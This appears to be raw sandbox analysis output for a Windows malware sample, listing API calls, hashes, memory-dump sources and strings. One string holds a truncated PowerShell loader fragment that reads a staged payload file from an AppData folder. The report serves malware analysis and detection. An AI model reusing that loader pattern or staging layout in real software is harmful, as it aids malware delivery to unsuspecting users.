                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                  • String ID: "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$over$: Completed$A$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe
                                                                  • API String ID: 2246997448-844883680
                                                                  • Opcode ID: 03c9c59eb4c84b91af2bf482532f4491c109ec4953ec4fed60a3dea33e08e02c
                                                                  • Instruction ID: 23f2a3ef68cc2ecf1ba22192b5584ba95f97fd263584382d2916c135efe1ecf3
                                                                  • Opcode Fuzzy Hash: 03c9c59eb4c84b91af2bf482532f4491c109ec4953ec4fed60a3dea33e08e02c
                                                                  • Instruction Fuzzy Hash: 179164B1900215ABDB11AFA1CD85AAF77B8EF85314F14843BF601B72D1DB7C8A41CB69
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens, xrefs: 004020F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens
                                                                  • API String ID: 542301482-42787560
                                                                  • Opcode ID: eb67aea980843a7017acfc17951cd482fde5a1829f11ebcb7b3e66b289fc0632
                                                                  • Instruction ID: 980c83093501945f33440b76d7cafb195365f9a7aefe91f5dd6c45d3bc957592
                                                                  • Opcode Fuzzy Hash: eb67aea980843a7017acfc17951cd482fde5a1829f11ebcb7b3e66b289fc0632
                                                                  • Instruction Fuzzy Hash: 77415C75A00104BFCB00DFA4CD88EAE7BB6EF88315B20456AF905EB2D1DA79ED41CB55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !C$ !C
                                                                  • API String ID: 0-4112869800
                                                                  • Opcode ID: f244a69970be5e3fb7395b2eb28eccf6eedf7c5e0ffd2bc2360b4ba292bdf26c
                                                                  • Instruction ID: 9d59628195055c55702702634927743170e9131f895cfb3327bf2ff62f88c604
                                                                  • Opcode Fuzzy Hash: f244a69970be5e3fb7395b2eb28eccf6eedf7c5e0ffd2bc2360b4ba292bdf26c
                                                                  • Instruction Fuzzy Hash: F2C15971A0021ACBCF18CF68D5905EEB7B2BF98314F26826AD8567B380D7346952CF94
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: dcc129d6bac15f0bd9ab37cd77dafa9dab2e5e89b57295ac72d2f639f22196f4
                                                                  • Instruction ID: acf40542f5c489c1fe3f42b28250c4c8421c5faf7d3490952b38be557a9d2a1a
                                                                  • Opcode Fuzzy Hash: dcc129d6bac15f0bd9ab37cd77dafa9dab2e5e89b57295ac72d2f639f22196f4
                                                                  • Instruction Fuzzy Hash: BEF0B8B16002109BCB00EFA0CD489AEB378FF08324F20097AF101F30D0D6B899009B2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                  • Instruction ID: 831d3521bb97c66da2d66f325b0a06c49e3003946fd67b3772e4acd4ce90d7ab
                                                                  • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                  • Instruction Fuzzy Hash: DDE17B71900719DFDB24CF58C880BAAB7F5EB44305F15892EE897AB2D1D778A961CF04
                                                                  APIs
                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404221
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404235
                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404252
                                                                  • GetSysColor.USER32(?), ref: 00404263
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404271
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040427F
                                                                  • lstrlenW.KERNEL32(?), ref: 00404284
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404291
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004042A6
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004042FF
                                                                  • SendMessageW.USER32(00000000), ref: 00404306
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404331
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404382
                                                                  • SetCursor.USER32(00000000), ref: 00404385
                                                                  • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 0040439A
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004043A6
                                                                  • SetCursor.USER32(00000000), ref: 004043A9
                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004043D8
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004043EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                  • String ID: @.C$N$open
                                                                  • API String ID: 3615053054-801394694
                                                                  • Opcode ID: 963217090c97da4adcbcf15c24e762bcbfd2aad3b5ef9f006c5e90e2b7288751
                                                                  • Instruction ID: bcd791c445e14c4d77ec78b24435c59c5d20c83db90324e08484bccd48c03535
                                                                  • Opcode Fuzzy Hash: 963217090c97da4adcbcf15c24e762bcbfd2aad3b5ef9f006c5e90e2b7288751
                                                                  • Instruction Fuzzy Hash: 727181B1A00209BFDB109F60DD85E6A7B79FB84355F04803AFB05B62D1C779A961CF98
                                                                  APIs
                                                                  • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C63,?,?,00000001,004057DB,?,00000000,000000F1,?), ref: 00405ACF
                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C63,?,?,00000001,004057DB,?,00000000,000000F1,?), ref: 00405AF3
                                                                  • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405AFC
                                                                    • Part of subcall function 00405972: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 00405982
                                                                    • Part of subcall function 00405972: lstrlenA.KERNEL32(00405BAC,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 004059B4
                                                                  • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405B19
                                                                  • wsprintfA.USER32 ref: 00405B37
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B72
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B81
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405BB9
                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00430498,00000000,-0000000A,0040A514,00000000,[Rename],00000000,00000000,00000000), ref: 00405C0F
                                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405C21
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405C28
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405C2F
                                                                    • Part of subcall function 00405A0D: GetFileAttributesW.KERNELBASE(00000003,00402DA7,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00405A11
                                                                    • Part of subcall function 00405A0D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,0040344F,?), ref: 00405A33
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                                  • API String ID: 1265525490-899692902
                                                                  • Opcode ID: 0a17e51cce6490609f0f77533b4495ec8614e759a42bed5fb578cd96ca66f47b
                                                                  • Instruction ID: 7e8ca1d3d50ba167f29b61b8a94756d2149cb8eb8d1ee9df404c58700b9860d6
                                                                  • Opcode Fuzzy Hash: 0a17e51cce6490609f0f77533b4495ec8614e759a42bed5fb578cd96ca66f47b
                                                                  • Instruction Fuzzy Hash: B1411671204B19BFD2206B615D49F6B3B6CEF45715F14003AF942B62D2EA7CE9018A7D
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                  • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                                  • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                  • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                                  APIs
                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 00406098
                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060A7
                                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 004060AC
                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 004060BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\yMXFgPOdf2.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-2323076595
                                                                  • Opcode ID: 5d64c10bc97e62ea4a676719e588da5fc07abd2ce6560c5e8650e212b13ecad1
                                                                  • Instruction ID: 35fbf6a24d661ac63574abd6f2b5f3cfaee5f5a3e28f3d5ffd4c7fbc13fd6fb5
                                                                  • Opcode Fuzzy Hash: 5d64c10bc97e62ea4a676719e588da5fc07abd2ce6560c5e8650e212b13ecad1
                                                                  • Instruction Fuzzy Hash: 1F11C81684061299DB30BB148C40A7772E8EF55754F56843FED86732C0E7BC4CA282BD
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040406A
                                                                  • GetSysColor.USER32(00000000), ref: 00404086
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404092
                                                                  • SetBkMode.GDI32(?,?), ref: 0040409E
                                                                  • GetSysColor.USER32(?), ref: 004040B1
                                                                  • SetBkColor.GDI32(?,?), ref: 004040C1
                                                                  • DeleteObject.GDI32(?), ref: 004040DB
                                                                  • CreateBrushIndirect.GDI32(?), ref: 004040E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                  • Instruction ID: 4290116d03e1e938411804169c88583f7df32a2dcd0dedbcf70a7ff5d4599883
                                                                  • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                  • Instruction Fuzzy Hash: 0F2157B15007049BC7319F68DD48B5B7BF8AF41714F04893DEA95F2691D734D948CB64
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                                                                    • Part of subcall function 00405A90: ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031DB,00000000,00000000,00402FF3,000000FF,00000004,00000000,00000000,00000000), ref: 00405AA4
                                                                    • Part of subcall function 00405CE8: wsprintfW.USER32 ref: 00405CF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                  • String ID: 9
                                                                  • API String ID: 1149667376-2366072709
                                                                  • Opcode ID: 1ebf7e8ea81d9f721691c6586ac75f819ca406a5e40d7b7a1c139251d0037f51
                                                                  • Instruction ID: 712a0fc01c11b6dc7c3c5e68f53f431dee7eef2fa5089cb8e9bfef1fdcaab261
                                                                  • Opcode Fuzzy Hash: 1ebf7e8ea81d9f721691c6586ac75f819ca406a5e40d7b7a1c139251d0037f51
                                                                  • Instruction Fuzzy Hash: A151EBB1D00219AADF14DFA4DA88AAEB779FF04304F50443BE501B62D0DB759E42CB69
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
